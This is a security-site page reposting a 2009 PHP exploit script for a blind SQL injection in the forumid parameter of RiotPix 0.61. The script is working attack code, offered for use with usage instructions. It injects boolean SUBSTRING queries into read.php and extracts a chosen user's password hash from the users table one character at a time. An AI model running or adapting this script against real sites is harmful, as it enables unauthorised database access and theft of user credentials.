首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:cOndemned 发布时间:2009-01-07  
<?php

/*

$Id: riotpix-0.61.txt,v 0.1 2009/01/06 03:47:30 cOndemned Exp $

RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
Bug found && Exploited by cOndemned

Download :

http://www.riotpix.com/download/riotpix0_61.zip


Description :

It's just simple Blind SQL Injection exploit that gets
password hash of given user. Code is really simple -
without proxy, or error handling, but i don't think it is
important, as long as the RiotPix isn't famous script...

-------------------------------------------------------------------

Greetz:

ZaBeaTy, str0ke, sid.psycho & TWT, wojtus0007, 0in, vCore


"...What is left to die for, what is left to give..."

*/


echo "\n[~] RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit";
echo "\n[~] Bug found && Exploited by cOndemned\n";

if($argc != 4)
{
printf("[!] Usage: php %s <target_size> <username> <topic_id>\n\n", $argv[0]);
exit;
}

list($sploit, $target, $username, $topicid) = $argv;

$charsArr = array(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102);
$pos = 1;

echo "[~] Password Hash : ";

while($pos != 33)
{
for($i = 0; $i <= count($charsArr); $i++)
{
$query = "/read.php?forumid=$topicid+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='$username'),$pos,1)=CHAR({$charsArr[$i]})--";
$source = file_get_contents($target . $query);

if(!eregi('existent', $source)) 
{
printf("%s", chr($charsArr[$i]));
$pos++;
break;
}
flush(STDOUT);
}
}

echo "\n[~] Done\n\n";

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle 10g SYS.LT.COMPRESSWORK
·Debian GNU/Linux XTERM (DECRQS
·Oracle 10g SYS.LT.MERGEWORKSPA
·Goople <= 1.8.2 (frontpage.php
·Oracle 10g SYS.LT.REMOVEWORKSP
·Rosoft Media Player 4.2.1 Loca
·Safari (Arguments) Array Integ
·SeaMonkey <= 1.1.14 (marquee)
·PHPAuctionSystem (XSS/SQL) Mul
·VUPlayer version 2.49 local de
·VUPlayer 2.49 (.wax File) Loca
·CoolPlayer BUILD 219 'Playlist
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved